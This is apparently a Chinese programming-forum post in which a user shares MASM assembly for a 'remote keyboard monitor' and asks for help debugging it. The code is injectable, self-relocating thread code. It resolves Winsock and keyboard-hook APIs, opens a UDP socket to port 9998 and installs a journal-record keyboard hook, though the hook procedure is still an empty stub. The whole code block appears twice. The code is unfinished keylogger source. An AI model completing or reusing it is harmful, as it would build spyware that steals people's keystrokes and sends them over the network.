2.1w+
社区成员
根据老罗的例子写一个远程键盘监控,请大家帮我分析一下问题
REMOTE_CODE_START equ this byte
_lpLoadLibrary dd ? ;导入函数地址表
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
hsocket dd ?
szip db '127.0.0.1',0
stSin sockaddr_in <?>
hook dd ?
_lpWSAStartup dd ?
_lpsocket dd ?
_lphtons dd ?
_lpinet_addr dd ?
_lpsendto dd ?
_lpSetWindowsHookEX dd ?
_lpCallNextHookEx dd ?
_lpGetKeyboardState dd ?
_lpGetKeyState dd ?
_lpToAscii dd ?
_hInstance dd ?
;_hWinMain dd ?
;_szClassName db 'RemoteClass',0
;_szCaptionMain db 'RemoteWindow',0
_szWs2_32 db 'Ws2_32.dll',0
_szWSAStartup db 'WSAStartup',0
_szsocket db 'socket',0
_szhtons db 'htons',0
_szinet_addr db 'inet_addr',0
_szsendto db 'sendto',0,0
_szDllUser db 'User32.dll',0
_szSetWindowsHookEx db 'SetWindowsHookEx',0
_szCallNextHookEx db 'CallNextHookEx',0
_szGetKeyboardState db 'GetKeyboardState',0
_szGetKeyState db 'GetKeyState',0
_szToAscii db 'ToAscii',0,0 ;这里两个0是用来判断用的
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoteThread proc uses ebx edi esi lParam
local @hModule
call @F
@@:
pop ebx
sub ebx,offset @B ;获得偏移的地址,用来自定位
;********************************************************************
;当lpGetModuleHandle的参数是NULL是获得的是本进程的-
_invoke [ebx + _lpGetModuleHandle],NULL
mov [ebx + _hInstance],eax
lea eax,[ebx + offset _szDllUser]
;获得user32.dll的句柄
_invoke [ebx + _lpGetModuleHandle],eax
mov @hModule,eax
lea esi,[ebx + offset _szSetWindowsHookEx]
lea edi,[ebx + offset _lpSetWindowsHookEX]
;用循环的方法获得一些函数的入口地址
.while TRUE
_invoke [ebx + _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb ;lodsb是把esi内容送到eax,并且esi+1,指向下一个[esi+1]
or al,al
jnz @B ;不为0则跳到@@,不为0说明串内容没完
.break .if ! byte ptr [esi] ;说明出现2个0了,停止循环
.endw
lea eax,[ebx + offset _szWs2_32]
;获得user32.dll的句柄
_invoke [ebx + _lpGetModuleHandle],eax
mov @hModule,eax
lea esi,[ebx + offset _szWSAStartup]
lea edi,[ebx + offset _lpWSAStartup]
;用循环的方法获得一些函数的入口地址
.while TRUE
_invoke [ebx + _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb ;lodsb是把esi内容送到eax,并且esi+1,指向下一个[esi+1]
or al,al
jnz @B ;不为0则跳到@@,不为0说明串内容没完
.break .if ! byte ptr [esi] ;说明出现2个0了,停止循环
.endw
;********************************************************************
call _WinMain
ret
_RemoteThread endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ZeroMemory proc _lpDest,_dwSize
push edi
mov edi,_lpDest
mov ecx,_dwSize
xor eax,eax
cld
rep stosb
pop edi
ret
_ZeroMemory endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookProc proc _dwCode,_wParam,_lParam
local @szKeyState[256]:byte
local szAscii[32]:byte
ret
HookProc endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain proc uses ebx esi edi
local @stWsa:WSADATA
;local @stFdSet:fd_set,@stTimeval:timeval
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
; 创建 socket
;********************************************************************
lea eax,@stWsa
_invoke [ebx+_lpWSAStartup],101h,eax
_invoke [ebx+_lpsocket],AF_INET,SOCK_DGRAM,0 mov [ebx+hsocket],eax
lea esi, stSin
add esi,ebx
assume esi :ptr sockaddr_in
_invoke [ebx+_lphtons],270eh ;270e=9998端口号??????
mov [esi].sin_port,ax
mov [esi].sin_family,AF_INET
lea eax,[ebx+offset szip]
_invoke [ebx+_lpinet_addr],eax
mov [esi].sin_addr,eax
mov eax,[ebx + _hInstance]
lea edx,[ebx+offset HookProc]
_invoke [ebx+_lpSetWindowsHookEX],WH_JOURNALRECORD,edx,eax,NULL ;这句有问题,可是我不知道这么分析了
mov [ebx+hook],eax
;ret
_WinMain endp
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_lpLoadLibrary dd ? ;导入函数地址表
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
hsocket dd ?
szip db '127.0.0.1',0
stSin sockaddr_in <?>
hook dd ?
_lpWSAStartup dd ?
_lpsocket dd ?
_lphtons dd ?
_lpinet_addr dd ?
_lpsendto dd ?
_lpSetWindowsHookEX dd ?
_lpCallNextHookEx dd ?
_lpGetKeyboardState dd ?
_lpGetKeyState dd ?
_lpToAscii dd ?
_hInstance dd ?
;_hWinMain dd ?
;_szClassName db 'RemoteClass',0
;_szCaptionMain db 'RemoteWindow',0
_szWs2_32 db 'Ws2_32.dll',0
_szWSAStartup db 'WSAStartup',0
_szsocket db 'socket',0
_szhtons db 'htons',0
_szinet_addr db 'inet_addr',0
_szsendto db 'sendto',0,0
_szDllUser db 'User32.dll',0
_szSetWindowsHookEx db 'SetWindowsHookEx',0
_szCallNextHookEx db 'CallNextHookEx',0
_szGetKeyboardState db 'GetKeyboardState',0
_szGetKeyState db 'GetKeyState',0
_szToAscii db 'ToAscii',0,0 ;这里两个0是用来判断用的
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoteThread proc uses ebx edi esi lParam
local @hModule
call @F
@@:
pop ebx
sub ebx,offset @B ;获得偏移的地址,用来自定位
;********************************************************************
;当lpGetModuleHandle的参数是NULL是获得的是本进程的-
_invoke [ebx + _lpGetModuleHandle],NULL
mov [ebx + _hInstance],eax
lea eax,[ebx + offset _szDllUser]
;获得user32.dll的句柄
_invoke [ebx + _lpGetModuleHandle],eax
mov @hModule,eax
lea esi,[ebx + offset _szSetWindowsHookEx]
lea edi,[ebx + offset _lpSetWindowsHookEX]
;用循环的方法获得一些函数的入口地址
.while TRUE
_invoke [ebx + _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb ;lodsb是把esi内容送到eax,并且esi+1,指向下一个[esi+1]
or al,al
jnz @B ;不为0则跳到@@,不为0说明串内容没完
.break .if ! byte ptr [esi] ;说明出现2个0了,停止循环
.endw
lea eax,[ebx + offset _szWs2_32]
;获得user32.dll的句柄
_invoke [ebx + _lpGetModuleHandle],eax
mov @hModule,eax
lea esi,[ebx + offset _szWSAStartup]
lea edi,[ebx + offset _lpWSAStartup]
;用循环的方法获得一些函数的入口地址
.while TRUE
_invoke [ebx + _lpGetProcAddress],@hModule,esi
mov [edi],eax
add edi,4
@@:
lodsb ;lodsb是把esi内容送到eax,并且esi+1,指向下一个[esi+1]
or al,al
jnz @B ;不为0则跳到@@,不为0说明串内容没完
.break .if ! byte ptr [esi] ;说明出现2个0了,停止循环
.endw
;********************************************************************
call _WinMain
ret
_RemoteThread endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ZeroMemory proc _lpDest,_dwSize
push edi
mov edi,_lpDest
mov ecx,_dwSize
xor eax,eax
cld
rep stosb
pop edi
ret
_ZeroMemory endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HookProc proc _dwCode,_wParam,_lParam
local @szKeyState[256]:byte
local szAscii[32]:byte
ret
HookProc endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain proc uses ebx esi edi
local @stWsa:WSADATA
;local @stFdSet:fd_set,@stTimeval:timeval
call @F
@@:
pop ebx
sub ebx,offset @B
;********************************************************************
; 创建 socket
;********************************************************************
lea eax,@stWsa
_invoke [ebx+_lpWSAStartup],101h,eax
_invoke [ebx+_lpsocket],AF_INET,SOCK_DGRAM,0 mov [ebx+hsocket],eax
lea esi, stSin
add esi,ebx
assume esi :ptr sockaddr_in
_invoke [ebx+_lphtons],270eh ;270e=9998端口号??????
mov [esi].sin_port,ax
mov [esi].sin_family,AF_INET
lea eax,[ebx+offset szip]
_invoke [ebx+_lpinet_addr],eax
mov [esi].sin_addr,eax
mov eax,[ebx + _hInstance]
lea edx,[ebx+offset HookProc]
_invoke [ebx+_lpSetWindowsHookEX],WH_JOURNALRECORD,edx,eax,NULL ;这句有问题,可是我不知道这么分析了
mov [ebx+hook],eax
;ret
_WinMain endp
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
...全文
请发表友善的回复…
发表回复